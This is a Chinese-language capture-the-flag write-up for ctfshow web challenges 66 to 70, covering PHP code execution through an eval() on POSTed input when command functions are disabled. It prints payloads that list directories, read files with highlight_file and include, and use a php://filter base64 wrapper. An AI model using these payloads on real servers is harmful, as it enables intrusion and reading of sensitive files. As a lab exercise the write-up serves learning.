ctfshow(66->70)--RCE/命令执行漏洞--禁用命令执行函数

Web66

源代码:

复制代码
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

代码审计:

POST传参c,eval进行代码执行。

思路:

由于题目过滤了命令执行函数,所以使用其他方法进行RCE。

先使用c=var_dump(scandir("."))查看当前目录下的文件,发现了flag.php
highlight_file('flag.php')查看发现没有flag.

于是使用c=var_dump(scandir("/"))查看根目录,发现flag.txt

EXP:

复制代码
c=highlight_file('/flag.php');

得到flag.

Web67

与上一题做法相同。

Web68

进入界面,回显为一个报错:

代码审计:

说明highlight_file()函数被禁用了。

思路:

用php伪协议查看文件内容。

EXP:

复制代码
c=include($_POST[1]);&1=php://filter/convert.base64-encode/resource=/flag.txt

base64解码得到flag.

Web69

回显与上一题相同。

思路

查看目录下的文件:

复制代码
c=var_dump(scandir("/"));
c=print_r(scandir("/"));

发现两个打印函数都被过滤了。

替换为var_export或implode即可。

EXP:

查看目录:

复制代码
c=var_export(scandir("/"));
c=echo implode("--",scandir("/"));

读取文件内容:

复制代码
c=include("/flag.txt");

Web 70

与上一题做法相同。

相关推荐
虹科数字化与AR1 分钟前
安宝特方案丨AR电力·变电篇:筑牢变电站安全运维
运维·安全·ar
虹科数字化与AR3 分钟前
安宝特方案丨AR电力 · 输电篇:破解高空作业安全与协同难题
安全·ar
Fnetlink116 分钟前
零信任网络架构是什么及零信任的发展趋势
安全·web安全
飞函安全18 分钟前
MongoBleed:MongoDB的秘密漏洞
数据库·安全·mongodb
白帽子黑客杰哥36 分钟前
Hack The Box和Try Hack Me两个平台在渗透测试训练上各有什么特色?
安全·web安全
kkk_皮蛋1 小时前
WebRTC 安全机制 (DTLS、SRTP、ICE、权限管理)
安全·webrtc
lbb 小魔仙1 小时前
【Linux】Linux 安全实战:防火墙配置 + 漏洞修复,符合企业合规标准
linux·运维·安全
玥轩_5211 小时前
防火墙技术-综合应用实验-2
网络·网络安全·智能路由器·防火墙·交换机·三层交换
艾莉丝努力练剑1 小时前
【Linux进程(七)】进程虚拟地址空间详解:从概念到实现与设计哲学
java·linux·运维·服务器·人工智能·安全·进程
培培说证1 小时前
2026高职网络安全专业入门级证书大全。
安全·web安全